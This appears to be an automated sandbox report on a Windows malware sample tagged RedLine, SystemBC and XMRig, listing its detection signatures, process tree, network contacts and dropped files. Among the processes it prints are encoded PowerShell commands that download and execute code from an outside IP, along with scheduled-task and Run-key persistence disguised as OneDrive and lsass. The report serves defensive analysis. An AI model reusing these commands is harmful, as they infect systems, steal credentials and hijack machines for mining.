Malware Analysis Report

2025-04-03 09:39

Sample ID 230506-22sdqagh7y
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags
redline systembc xmrig infostealer miner persistence stealer trojan [ pro ] spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

redline systembc xmrig infostealer miner persistence stealer trojan [ pro ] spyware

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

SystemBC

Detects Redline Stealer samples

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: LoadsDriver

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 23:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 23:05

Reported

2023-05-07 01:42

Platform

win7-20230220-en

Max time kernel

151s

Max time network

146s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 268 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 set thread context of 1344 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 756 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 756 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 756 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 756 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 756 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 756 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 756 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 756 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 756 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 756 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1076 wrote to memory of 1464 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1464 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1464 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1528 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1528 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1528 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 560 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 560 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 560 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1512 wrote to memory of 284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1348 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1348 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1348 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1544 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1544 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1544 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1908 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1908 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1908 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1580 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1580 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1580 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1580 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1580 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1580 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1580 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1580 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {8E351A0D-A54B-431F-A5A8-7417E4518E7B} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 03:45 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3E1A.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp

Files

memory/2044-54-0x0000000000940000-0x0000000000958000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIGXFCBUXLXFNYYFBGXW.temp

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1992-74-0x00000000022C0000-0x0000000002340000-memory.dmp

memory/756-75-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

memory/756-76-0x0000000002410000-0x0000000002418000-memory.dmp

memory/1992-78-0x00000000022CB000-0x0000000002302000-memory.dmp

memory/1992-77-0x00000000022C4000-0x00000000022C7000-memory.dmp

memory/284-79-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-80-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/1936-82-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/284-81-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/284-84-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-83-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/1936-85-0x0000000002750000-0x000000000275E000-memory.dmp

memory/284-86-0x0000000002970000-0x0000000002980000-memory.dmp

memory/756-87-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/284-88-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/284-89-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-90-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/284-91-0x00000000027E0000-0x0000000002860000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
